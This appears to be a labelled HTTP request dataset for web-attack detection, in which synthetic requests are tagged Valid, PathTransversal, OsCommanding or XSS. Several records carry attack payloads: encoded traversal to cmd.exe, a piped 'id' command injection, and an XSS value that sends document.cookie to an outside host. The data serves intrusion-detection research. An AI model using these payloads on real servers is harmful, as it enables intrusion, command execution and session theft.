If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 7.2
Pragma: 1r='nu5'
Proxy-Authorization: NTLM aW9ud3lrdGl0dGFidThlSGljMGFsdHQzZTZnZXNnbWxuZTZvY0hyaWMx
Authorization: NTLM TzJiaEJhYVNlc2l2RTMxamxhaWltOWVsZ25laWVxc2VuYWU=
Range: -26,-362
Referer: http://nsiua7q.com/4yjte/triciim.wav
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/9.5 (X11; U; Open BSD i586 8.6; 1t-on; rv:0.2.2) Gecko/30029293
UA-CPU: Sparc
UA-Disp: 3286,345,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 190x433
Via: FTP/2.9 192.213.226.103, HTTP/9.9 www.suuuNao3.tiff, FTP/7.7 89.41.220.90
Transfer-Encoding: compress
Upgrade: 2itths/2.9, Hsy/8.5, vnT/6.7
Warning: 556 www.nSecserr.shtml "kaqb8" "Fri, 10 Aug 07 08:19:22 CET"
X-Forwarded-For: 98.254.54.114
X-Serial-Number: 21651458708939157204
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 26619
Start - Id: 44868
class: PathTransversal
GET /unto2lml42hatrtoEl1s/nclaeibnnoaTlcelria/Kniehseme2vh3gdhsu/S2FMbHg7C/ypchmsahsy19jxnt/fhalNua/eAynC7elug/es7x3n/kumo/fr9fuogHY-lts0NE/sWmlxjG0Fo.jpeg?drn=Eth&iisopini=wot&ebt=43864&D6zCftpfyJboot.iniv=PE&23feEjCe8isoE4t=ntoena&tm=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&re7ee=and3%3CsT%2B+%7C%26o%5D%3Fd%3FH+ue%5C%28&to=t079q8qgNnn&eSEf=caol8oeq5vy%3Bec&ca=h%24a5&ochnmeeovba=i2NG1Xje&oo1mOitt=0291&hiinnhv9lcA=34830291&i7staaeUs8lh9nt=403 HTTP/1.1
Host: www.RwIaudsr.ch
Connection: close
Accept: audio/*, video/quicktime;q=0.4
Accept-Charset: cp-936;q=0.1, x-mac-greek;q=0.7, utf-8;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 17.82.53.2
Cookie: UimOtoYnIe=n1;Esct=98722;fpeioidrtTrrh=ce6cvarnywget;Ieawindow.open=shutdown+9rt
Cookie2: $Version="6"
Date: Tue, 03 Jun 08 07:04:09 CET
ETag: "1zhRIGqs9bhrirWiAR"
Expect: 100-continue
From: alne@9raesl8.gov
If-Modified-Since: Sat, 27 Mar 04 12:51:55 GMT
If-Unmodified-Since: Thu, 30 Aug 07 14:33:50 CET
If-Match: "pmfY041lx7FgKFTLov"
If-None-Match: "UunXHK8cxJ-@RnFOhpj"
If-Range: *
Max-Forwards: 1
MIME-Version: 5.3
Pragma: igf8ip=6mthTY
Proxy-Authorization: boirwt l8nta=oels3is
Authorization: Basic bmdwbzpjc3RMbWU=
Range: 165-47102,-98
Referer: http://reqti.com/tOngon/ratzhtfr.asp
TE: trailers,deflate
Trailer: Referer
User-Agent: etehhesTbxnentd
UA-CPU: PowerPC
UA-Disp: 280,070,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 458x842
Via: 1.3 www.pseesld.js
Transfer-Encoding: compress
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 14283566548757550982
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44868
Start - Id: 43870
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 86.98.21.31:4408
Connection: Ewleemnr
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, deflate, compress;q=0.7, deflate
Accept-Language: *
Cache-Control: max-stale
Client-ip: 132.134.82.134
Cookie: PWhtaccesR=itLis;suteeRrnahn8Gvt='t?<'iEr IconnectdOm-;eid=ir|tp
Cookie2: $Version="109"
Date: Sat, 18 Jul 09 24:45:44 CET
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 16 Jan 06 22:22:18 GMT
If-Unmodified-Since: Sun, 25 Sep 05 05:41:40 GMT
If-Match: "t-nu44CIJ9zpgSAjN0t"
If-None-Match: "2tQcTKqYyF0azjzu"
If-Range: Sun, 07 Aug 05 24:59:34 CET
Max-Forwards: 551
MIME-Version: 1.9
Pragma: fAttmFml='s4a'
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: lSOune xeikcnEt=6xsrh
Range: 91796-,027282-114595
Referer: http://oKxatEtf.fr/ntoe2.cfm
TE: chunked;q=0.5,chunked,deflate;q=0.4
Trailer: Accept-Language
User-Agent: ydrSey
UA-CPU: Sparc
UA-Disp: 7852,060,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/7.1 www.dsOpFhe.jpg:988, FTP/1.3 www.fndeeYt.html, HTTP/6.4 222.118.147.81:4
Transfer-Encoding: 1qsm; vrjcoda9=adoeErc7
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 271 62.138.196.100 "8z8l8ou" "Tue, 21 Feb 06 05:57:12 CET"
X-Forwarded-For: 160.49.9.9
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43870
Start - Id: 44264
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 108.101.163.253
Connection: ssufaxu
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.8, deflate, identity, gzip, compress;q=0.0
Accept-Language: *
Cache-Control: t2Eneh=ksn8k
Client-ip: 225.50.172.247
Cookie: og4idljeirD0n4=Pa fae;rAteglvdr=sUkfm
Cookie2: $Version="544"
Date: Sat, 21 Feb 04 03:19:49 CET
ETag: W/"JQx0uHTwXQsPyN32k.C"
Expect: 100-continue
From: Ce9h0dvt@naeheOu.st
If-Modified-Since: Mon, 19 Sep 05 05:53:20 GMT
If-Unmodified-Since: Tue, 28 Mar 06 09:06:31 GMT
If-Match: "Dy56Wh647-VkWPIaFs"
If-None-Match: *
If-Range: "q7xzCS_GeQV2Ruc"
Max-Forwards: 9
MIME-Version: 4.2
Pragma: at7b='e'
Proxy-Authorization: YOigog n4on=aery00e
Authorization: Digest algorithm=osHre
Range: 1630-9,-816
Referer: /lsrmntt/rmHfk.tiff
TE: deflate;q=0.2,chunked;q=0.2,trailers
Trailer: Referer
User-Agent: emeiusreft (gBeIVrcg.; rynoZjR7; h.RGPz; aI6hkQm_Ix; kBCiohKg)
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7064x6561
Via: HTTP/1.3 55.46.17.190, 1.8 165.175.26.205, FTP/0.6 www.xeee.html:06065
Transfer-Encoding: identity
Upgrade: ytc/5.0, mosem/3.9
Warning: 225 www.sthE.gif:19 "oyonins" 
X-Forwarded-For: 209.233.129.22
X-Serial-Number: 87791101469123011682
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44264
Start - Id: 4138
class: Valid
PUT /WfcdeleteO/r23Mikcoy/esrF-fYvf/o1plcrrii/oAfH/te/LBz/r-pNi@/aoyiwaan1jh/g4uHX5OUT34/tUzgV6Ah8H9g4YPyA8q5.gif? HTTP/1.1
Content-Length: 49
Content-Language: eu
Content-Encoding: compress
Content-Location: /aitszaPh.jpg
Content-MD5: c25lbnM5aWVyZW5xYXdvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Sep 09 13:54:35 GMT
Last-Modified: Fri, 16 Sep 05 18:52:27 CET
Host: 71.250.231.60
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=957
Client-ip: 14.99.234.115
Cookie: tEgietsona=3ihaioltn3nktd;kmgudcwoheu=83108419;ORW@cKASpe=eott7eU
Cookie2: $Version="8"
Date: Mon, 26 Dec 05 10:41:56 UTC
ETag: "TDLgR00qH-8h7@bqU"
Expect: nnith=vweeho;9cba
From: rwet72e@ewitgcyH.be
If-Modified-Since: Sun, 30 May 04 08:10:38 UTC
If-Unmodified-Since: Fri, 14 Jan 05 20:32:55 GMT
If-Match: "GF6YM7yS8oQ@FDpeu"
If-None-Match: *
If-Range: Tue, 15 Aug 06 24:13:42 CET
Max-Forwards: 4154
MIME-Version: 7.4
Pragma: afl87=iesteeqe
Proxy-Authorization: aisesf nMetM=q8cte1s
Authorization: Basic Y2VlcmhlNWk6aWl3ZnU=
Range: 981106-,64119-357939,-1
Referer: http://www.yl3eb.org/7nTrPee/st3le.exe
TE: gzip;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.9 (Windows; U; WinNT 0.4; 06-As; rv:7.8.7) Gecko/01206563
UA-CPU: Sparc
UA-Disp: 192,906,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4283x806
Via: 5.3 www.Z5aer.jpeg
Transfer-Encoding: gzip
Upgrade: hwse/6.1, u9heh/7.4, irm9/0.9, 6fero/4.3
Warning: 826 40.134.212.239:799 "oazhouehnn3r" 
X-Forwarded-For: 120.79.175.50
X-Serial-Number: 696921203220744
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

is4Ye2ttc0w=sHetzeerTUeht&weatk7cr=mxr5rrKa&mhj=1

End - Id: 4138
Start - Id: 2367
class: Valid
GET /MvObJ/rtM6nBFqB2Y-M48JC/oGJrm2jXBNF3.htm?evalq1QKO=247101&1rwjuiia=ueu&njndcnsehy=6704&5asre9l=65&1s=35020543&HewvymdwEeoe=3&I4ld=i-9FVJN&aavmh8=hP&1YY4vBMbgsoundw=dafqiidis0bgsleron&iezA9l6aexaOdxD=33980963&xJDCmetapoptqV=h HTTP/1.1
Host: www.aenmrr.st
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: e-eIe, ax-9udtri, fErNed-p9FuV;q=0.6, en-Dieambhe
Cache-Control: max-age=7904
Client-ip: 165.164.249.129
Cookie: naaioNn2sqaot=r5N;ds2seoDpoi=hin/;pgs=es8w httpiealibdh+eaccess_log
Cookie2: $Version="470"
Date: Tue, 20 Sep 05 12:15:26 UTC
ETag: W/"IoJUwyRwCSi1EXAsSud"
Expect: xpytrn
From: ssmE@EDar2top.be
If-Modified-Since: Wed, 24 May 06 22:13:44 UTC
If-Unmodified-Since: Fri, 26 Mar 10 09:04:25 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2720
MIME-Version: 7.2
Pragma: dioyoes='i'
Proxy-Authorization: Digest response="32CC03ccCD2C4F02bb800C8DE1CCEbDB"
Authorization: NTLM cmdubXRiMFJzbDhhc2R0YXM1aGFicmVuNmlkdnRnOWx5cnU0NmQ2ZG5jMmVu
Range: 0813-23,-3
Referer: /ttfdsb/AmhD/dkotBebx/aKne/u6QmsR.css
TE: deflate,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.2 (X11; U; Unix 2.5; eE-2a; rv:8.2.2) Gecko/97100548
UA-CPU: StrongARM
UA-Disp: 6863,178,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3780x3384
Via: 4.0 www.tuoyr3u.jpg:85, 2.2 www.vLht.js:05530
Transfer-Encoding: gzip
Upgrade: 74si/9.9, ixt/2.4, jarRcm/9.9, eiC/2.5
Warning: 978 www.d9mi.css "lg3eBieetoidotnsBnou" "Thu, 22 Oct 09 10:40:24 GMT"
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 67775
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2367
Start - Id: 9287
class: Valid
GET /0b.shtml? HTTP/1.0
Host: www.fwet0U.uk:5189
Connection: close
Accept: image/*
Accept-Charset: windows-1253, euc-kr;q=0.4
Accept-Encoding: gzip, identity;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 201.8.180.111
Cookie: 37ePt9=bto5lokg2wg2iial;ayGorkKbinl=6201
Cookie2: $Version="5"
Date: Sat, 19 Feb 05 21:49:00 GMT
ETag: "1KF4WEy8ez1@csQ"
Expect: 100-continue
From: iiae5@rlfv.it
If-Modified-Since: Wed, 03 Oct 07 11:56:53 GMT
If-Unmodified-Since: Fri, 18 Jul 08 08:19:38 CET
If-Match: *
If-None-Match: *
If-Range: "eLeTihx1AK4KlnS-oA"
Max-Forwards: 473
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic c2FvdDp0bU55bGt0
Authorization: ehago nt0i=iT6n
Range: -7,24425-
Referer: /bardte/Efoi/2a3rd/L7aber3.doc
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: abtoccstfdEatlp
UA-CPU: 68000
UA-Disp: 8991,9387,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1723x158
Via: FTP/4.9 www.ebOlt.js
Transfer-Encoding: identity
Upgrade: ne3a/3.0, ktz/8.6, tsjraE/5.2, hlfe/6.2
Warning: 773 228.146.161.18 "eogoeOendth" "Tue, 23 Jan 07 17:19:26 CET"
X-Forwarded-For: 215.205.82.248
X-Serial-Number: 378312956268
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9287
Start - Id: 11552
class: Valid
GET /naNCYtwEuGrhI/naPZRMQdPdsj1O_8Nn0/7@W3wp-BxjFoptLhtpassmail/rIi1XXKrN.htm?.RAJEkVHB686=i0u7qf3pppamse&dhnAfE7o1=k0o92yU8knf&3Kv7wT6Cm=wp-j1r&4OWS=3&c7Nevals=y3jBP&gRhnragz0ui=xrnetcatko&etcvdvglFwhere=17811&ic=ue.uEzx7U&hokct5p=410&vbwbteinwtHedsy=eU&YB1mailx9styleeSstyleS8=lRsatio%3Bla&1LI-BIz=5jio8uaftle5ui&dnot=emaqepfcysonen&ehV=d-7Q1a&1tsayOisEferetx=8xrhq HTTP/1.1
Host: 78.222.97.117
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: x-mac-korean, koi8, euc-tw
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 20.170.229.99
Cookie: 1S3A4r=0598;ehdi3ers=765
Cookie2: $Version="0"
Date: Sun, 02 Apr 06 19:54:21 CET
ETag: W/"XBXmsCFZNivhnxgjfe"
Expect: aErq
From: nikAlis@eeus.com
If-Modified-Since: Sat, 09 Aug 08 09:04:31 CET
If-Unmodified-Since: Thu, 02 Oct 08 24:11:33 GMT
If-Match: *
If-None-Match: "50649.VYtdtyVRftNG"
If-Range: "FotIECYv8jgAkK9AW.8r"
Max-Forwards: 918
MIME-Version: 5.9
Pragma: A=Vt
Proxy-Authorization: NTLM Y3NyZHVIaWVFOWxseW8yYWUwRWhzZWJlb0VuYW5obmVn
Authorization: Basic UnNhYWh0OmFUbm0=
Range: 8-
Referer: http://EsntK.uk/ho4ayau/nira2/topl.php3
TE: deflate
Trailer: Referer
User-Agent: orses/8.1.4
UA-CPU: StrongARM
UA-Disp: 2337,296,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 866x0586
Via: 6.1 46.86.219.75:86
Transfer-Encoding: identity
Upgrade: doots/6.6
Warning: 881 35.69.28.129 "mesddqopoikepkyer" 
X-Forwarded-For: 175.39.106.169
X-Serial-Number: 24189
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11552
Start - Id: 47182
class: XSS
GET /lb9/iltonhu/nk/FwwRUs_SQlCkpB.asmx?wn=5693325041&tiohZvmrlhiiie=+CesNryi0f4q%2Ba&tfT5osaidhmse=%26%7B%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.llente.com%2Fcgi-bin%2Fnarareanne.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B HTTP/1.0
Host: www.oheox.com
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-8859-8;q=0.1, windows-1255, x-mac-chinesetrad;q=0.2, euc-cn;q=0.4, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=7
Client-ip: 21.251.227.103
Cookie: ncd2S=047915;oaf=sxbn 
Cookie2: $Version="93"
Date: Thu, 05 Mar 09 19:07:25 UTC
ETag: W/"sx302XohAygbTfJiaE"
Expect: 100-continue
From: fpss@iohe.it
If-Modified-Since: Wed, 16 Jul 08 09:13:14 CET
If-Unmodified-Since: Sat, 09 Dec 06 11:53:44 CET
If-Match: "@leWTd7Sl0cGoL00g"
If-None-Match: "7w1NhNht1D-_UeimI56I"
If-Range: Sat, 02 Dec 06 01:40:03 UTC
Max-Forwards: 113
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM ckhVbThFczZLOW9pcWFjb2FkaWNlbHVDdzJpVWJya3BoZWUz
Authorization: Basic ZGlwZDpFYXJoaTdvaA==
Range: 671-463
Referer: /GlsEaqcz/uosJC5.dll
TE: deflate;q=0.8
Trailer: Transfer-Encoding
User-Agent: eI8athaNoo/8.6.7.2.4
UA-CPU: MIPS
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/0.6 www.ea75tsn.jpg
Transfer-Encoding: compress
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 85.51.180.168
X-Serial-Number: 533969856895
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47182
Start - Id: 47619
class: XSS
GET /y4aTrjen5hfNitkr/swwu4trquOutaNs/SPTk/e4ix/YCYNWfSBJ5WwNDlike/ee/4dvsMra0nqw5meegnv/pp0.css?sgtnz=522&shooljmfe27t=6542988172&bnnku=%3Cimg++dynsrc+++%3D++%22+javascript%3A%5Balert+%28%27go%27%29%3B%5D+++++%22++%3E&52PcdmtqThi=352988&g4ont7oiuEst9r=aa HTTP/1.1
Host: 39.47.74.132:80
Connection: Ated7qa
Accept: text/plain, video/quicktime;q=0.9
Accept-Charset: iso-2022-kr;q=0.6, iso-8859-4
Accept-Encoding: deflate, deflate
Accept-Language: *
Cache-Control: min-fresh=13
Client-ip: 254.77.17.52
Cookie: ahnbOaTOtFvua=taasq
Cookie2: $Version="5"
Date: Sat, 27 Mar 10 11:24:37 GMT
ETag: W/"UtO@wp6ZQnYA6s5"
Expect: 100-continue
From: drEnA@edtwavoDoa.com
If-Modified-Since: Mon, 24 Nov 08 17:55:18 UTC
If-Unmodified-Since: Wed, 04 May 05 10:55:11 CET
If-Match: "0RSXYfsh1Zj@J5Hh_"
If-None-Match: "_YMqKdhsWf6vgzZfX"
If-Range: Fri, 03 Dec 04 05:07:13 GMT
Max-Forwards: 27
MIME-Version: 4.2
Pragma: wi3hki='Rd3e9als'
Proxy-Authorization: Basic b29iYWU6c3NpdnI=
Authorization: Basic ZHN0d25pZDp0b2hy
Range: 393273-
Referer: http://www.ik7a.com/6orq.exe
TE: deflate;q=0.3,gzip;q=0.3,chunked;q=0.6
Trailer: Expect
User-Agent: Mozilla/7.6 (X11; U; SunOS sun4u 2.7; mt-cp; rv:7.5.3) Gecko/75114027
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 608x141
Via: 5.9 233.19.193.96
Transfer-Encoding: identity
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 114 www.elevwen.jpg "oserePt" 
X-Forwarded-For: 19.35.93.68
X-Serial-Number: 2524902769036083814
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47619
Start - Id: 14210
class: Valid
GET /baU0oopH4aiemuaXov/3zhajtshouql/Hla0eihfbrps/tN_392/8r7Nl7giIrettapnvsr/oWexF.shtml?2FjgG9=%28%3EaKukwindow.openna%5Ciwsam&9nCasRcdhin=%3Bwinntcbttrnt&0U15evalq=t9ti2e08&Ztf5wgDt=a HTTP/1.0
Host: www.txbzdiItje.fr
Connection: keep-alive
Accept: image/png
Accept-Charset: x-mac-ce, euc-kr;q=0.5, euc-kr
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 129.83.240.253
Cookie: rtzare=oRQF;ofzvnnLh=iFlW
Cookie2: $Version="5"
Date: Fri, 04 Apr 08 01:55:35 UTC
ETag: W/"D_-EwIQg5KzurJ8"
Expect: tsTeh
From: hoeiim@ceoiedong.st
If-Modified-Since: Sat, 30 Sep 06 23:11:35 UTC
If-Unmodified-Since: Mon, 08 Mar 04 11:35:57 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 05 Jul 05 01:09:58 UTC
Max-Forwards: 3
MIME-Version: 0.5
Pragma: p=nsoesmot
Proxy-Authorization: dndh ietm=rse69h3
Authorization: Basic Z2Fpb2E6bmFpcGxyaQ==
Range: 835-87
Referer: http://www.g9sihioa.uk/8sme/mdte9t/oec99ot/rFUee.jpeg
TE: gzip
Trailer: Via
User-Agent: Mozilla/1.6 (Machintosh; U; Mac OS X 9.0; wd-oa; rv:6.2.1) Gecko/59670190
UA-CPU: x86
UA-Disp: 168,1348,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 962x171
Via: 9.6 www.tosdi.css:7509, 0.5 www.es6bsot.css
Transfer-Encoding: compress
Upgrade: tqng/4.9, Naqt/0.6
Warning: 631 173.31.157.130 "elNew" 
X-Forwarded-For: 210.15.101.50
X-Serial-Number: 8726872524288200
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 14210
Start - Id: 1619
class: Valid
GET /dxTeoq/fieaacuetd1jx/ofnb69eeiteoFhonks3/adminmhMXdOQU9OJ/dNvAs/en/dt@1hEZ8l7o6/lDF0/aitomiwnev.shtml?eahK=Hz7dr1ur+tig&C1L.UL=4-sny&n8bsrHrjacovhi=69BZ-umj.Jvh&CerBoor=gNem&ehjjToaeer=9&9xsasneme1eel=isiidh&h082=uhtIfiiidUttgn3e&eopvinzeRoa=sPTri.d&os=%2Bga&ie=071955&EdhEOonio=two&ntAtdrhtIhe=ss8ZW HTTP/1.1
Host: 188.46.200.223:80
Connection: close
Accept: audio/basic, application/*;q=0.8, image/*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: a-shtzlz, ims6Ou-n
Cache-Control: no-transform
Client-ip: 41.66.138.239
Cookie: oszCrnTte=d20Obwf3w;3arih=n?ctelnetz;hntmoTm=1onn;tohho2ceo=R%
Cookie2: $Version="28"
Date: Thu, 08 Apr 04 11:32:35 UTC
ETag: "HKxrEcsdQlBBBB.MQEw"
Expect: 100-continue
From: S6tD@nser.com
If-Modified-Since: Tue, 13 Apr 04 05:26:33 CET
If-Unmodified-Since: Fri, 12 Oct 07 13:07:57 UTC
If-Match: "jNa4GkbGdaPWj5GLlBX"
If-None-Match: "dx6pClckYyEfO3a5RSW"
If-Range: "HWBxFNrBrMurE9G2"
Max-Forwards: 6374
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic aWxnQTp0c2Vy
Authorization: Digest response="A8cde82e8bfCe4531Fcc3cD21Ee0e132"
Range: -60187,7-
Referer: http://www.oreni.net/4ghriia.tiff
TE: chunked,chunked
Trailer: Accept-Charset
User-Agent: rhiuveesv
UA-CPU: PowerPC
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7605x6639
Via: HTTP/3.5 73.16.28.217
Transfer-Encoding: gzip
Upgrade: E9o/3.0, tlHeh/4.8, eie/1.1, ktbco/4.2
Warning: 478 www.2leHh0te.css:121 "aurisc" 
X-Forwarded-For: 219.253.153.237
X-Serial-Number: 951782278923
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 1619
Start - Id: 30925
class: Valid
GET /seih7uomsss2gxY/rdnt4jvelsealg.css?pfCechoBzBaccess_log-=ie&cifwbeolIhth3l=25180261&aohraIocSwp=onra93s3&S5geicncr=6039&ss=zB_r2&eramw4le=5098 HTTP/1.0
Host: www.trwrmb6iia.gov
Connection: close
Accept: application/x-tar, application/*, video/*
Accept-Charset: hz-gb-2312;q=0.6, x-mac-icelandic;q=0.2, isiri-3342, shift_jis, utf-8
Accept-Encoding: identity, compress;q=0.5, compress;q=0.1, deflate;q=0.2, gzip
Accept-Language: e-tt;q=0.1, otu-rEqt
Cache-Control: no-cache
Client-ip: 237.192.101.254
Cookie: ryoaees8rsa7=1;iFBzl='nh;hj=4plZ25;hmniedebed=221613;dD3hSrtiaaoah=h8re
Cookie2: $Version="301"
Date: Sun, 07 Feb 10 24:12:09 GMT
ETag: W/"nVuwNmxr9TNDf-.rQVPL"
Expect: 100-continue
From: eSAnM@ahoeenfee.biz
If-Modified-Since: Sat, 13 Jan 07 21:35:31 GMT
If-Unmodified-Since: Sun, 13 Jan 08 20:15:13 CET
If-Match: *
If-None-Match: *
If-Range: "TvXUzCLzjVDq8cYM"
Max-Forwards: 489
MIME-Version: 0.3
Pragma: st='pTnh1dA'
Proxy-Authorization: Zw7ltl irs7a=wat2Do
Authorization: Basic aFR5RTFpaDpIODVjbGU=
Range: 8929-,26-
Referer: http://www.atounbjO.cz/iavsA/leu7/Neatnyr/orbdRetc/teie.mp3
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: n7b7weiQ
UA-CPU: MIPS
UA-Disp: 0407,7003,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1031x1153
Via: 1.8 www.Eforetso.js:7
Transfer-Encoding: identity
Upgrade: A2lari/6.5, teu/8.0, nttot/3.7, errra/9.4, eaUpm/9.6
Warning: 528 150.223.116.32 "eiib2tvfathrBNuolv" 
X-Forwarded-For: 93.207.235.159
X-Serial-Number: 535265474092814212
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30925
Start - Id: 43061
class: OsCommanding
PUT /oM8twuOmj/ltOi7mkadplcisxncnRw/5ndeit6/JjYz/fesugzh2bah8/bhuF/sHKy6gS5LO5NzSRZqM.html? HTTP/1.0
Content-Length: 313
Content-Language: ra,e,wei
Content-Encoding: identity
Content-Location: /ergms/ldEt/blEt.nsf
Content-MD5: emRnSHJlMm9sdHJGbGFjMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 02 Feb 07 12:20:49 UTC
Last-Modified: Sat, 08 Jul 06 24:33:46 GMT
Host: www.ejeramfnro.fr:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ay3ftnTE-steecd;q=0.1, m6oeed-set, nexam-soeyeun
Cache-Control: lianntA='j9ml'
Client-ip: 106.223.101.99
Cookie: e6oyoKAnw2c=it5nshutdown=oM;qiLTyKfNaZkI=420907
Cookie2: $Version="6"
Date: Mon, 12 Jan 09 20:58:20 CET
ETag: W/"iKLxWdAUMw1HFHpw@g"
Expect: 100-continue
From: sTleEdu@dtAttFd.de
If-Modified-Since: Tue, 11 May 04 06:40:11 CET
If-Unmodified-Since: Sun, 28 Jun 09 02:18:18 UTC
If-Match: "QL1Ivc@iqjP4N6rHlA8"
If-None-Match: "_eNPjrb3jxnMW0ToH"
If-Range: Thu, 18 Sep 08 08:59:25 CET
Max-Forwards: 9
MIME-Version: 1.8
Pragma: i0nedc5='eiy'
Proxy-Authorization: zaetf rssn=ghd0r
Authorization: Basic cGFrZVNsTzpvZWZ0MzR3aQ==
Range: -324,1-544,8-732
Referer: http://www.iicpnwl.fr/md2r/eheeBo/myjeip.dll
TE: deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/4.6 (Windows; U; Win98 1.1; or-no; rv:3.0.5) Gecko/79850051
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: oeni/1.6 69.127.27.89:082
Transfer-Encoding: identity
Upgrade: tun3o/7.3, omna/4.0
Warning: 511 www.SwtUak.png "nrU8ee" "Tue, 13 Jan 09 06:56:32 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 206096711388693916
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

htisUailLErrfx=ntahhAcseeetps&teAwEe6oa=n0e43&jhttpNo.TtKTQwgetrm=9G&azexnirnieTsrt=31218771&nunion.OSJS2m=hiyy9jsBKG&a35esla0W=to|teth&5gDr0form=eaRb&ytao=|   echo   "Content-Type: text/html" ;echo     ""    ;  id   \0&oiarnt5MiO=tttpStts&6reottggihiMN7=ti%0a[owTjhnmxawOsmp&LnfG=710277

End - Id: 43061
Start - Id: 2743
class: Valid
GET /eSSenYP5sl-NyaLd_w/n-SshtpassNOW/h6Z@C82v.css?yere=492&ieSiletOazaot=5IpbSHpYjFzn&et9icepRn=20334543&gnwr7eticEos=soot%25h&rnaoii=%28andilocationac0ntb&can=EIl5&hy=eepytotiN4hehSjfe&nHn8c=55318 HTTP/1.0
Host: www.4a5oh.com
Connection: close
Accept: application/postscript, video/quicktime, image/png;q=0.3
Accept-Charset: isiri-3342, x-mac-roman, iso-8859-6
Accept-Encoding: gzip;q=0.0
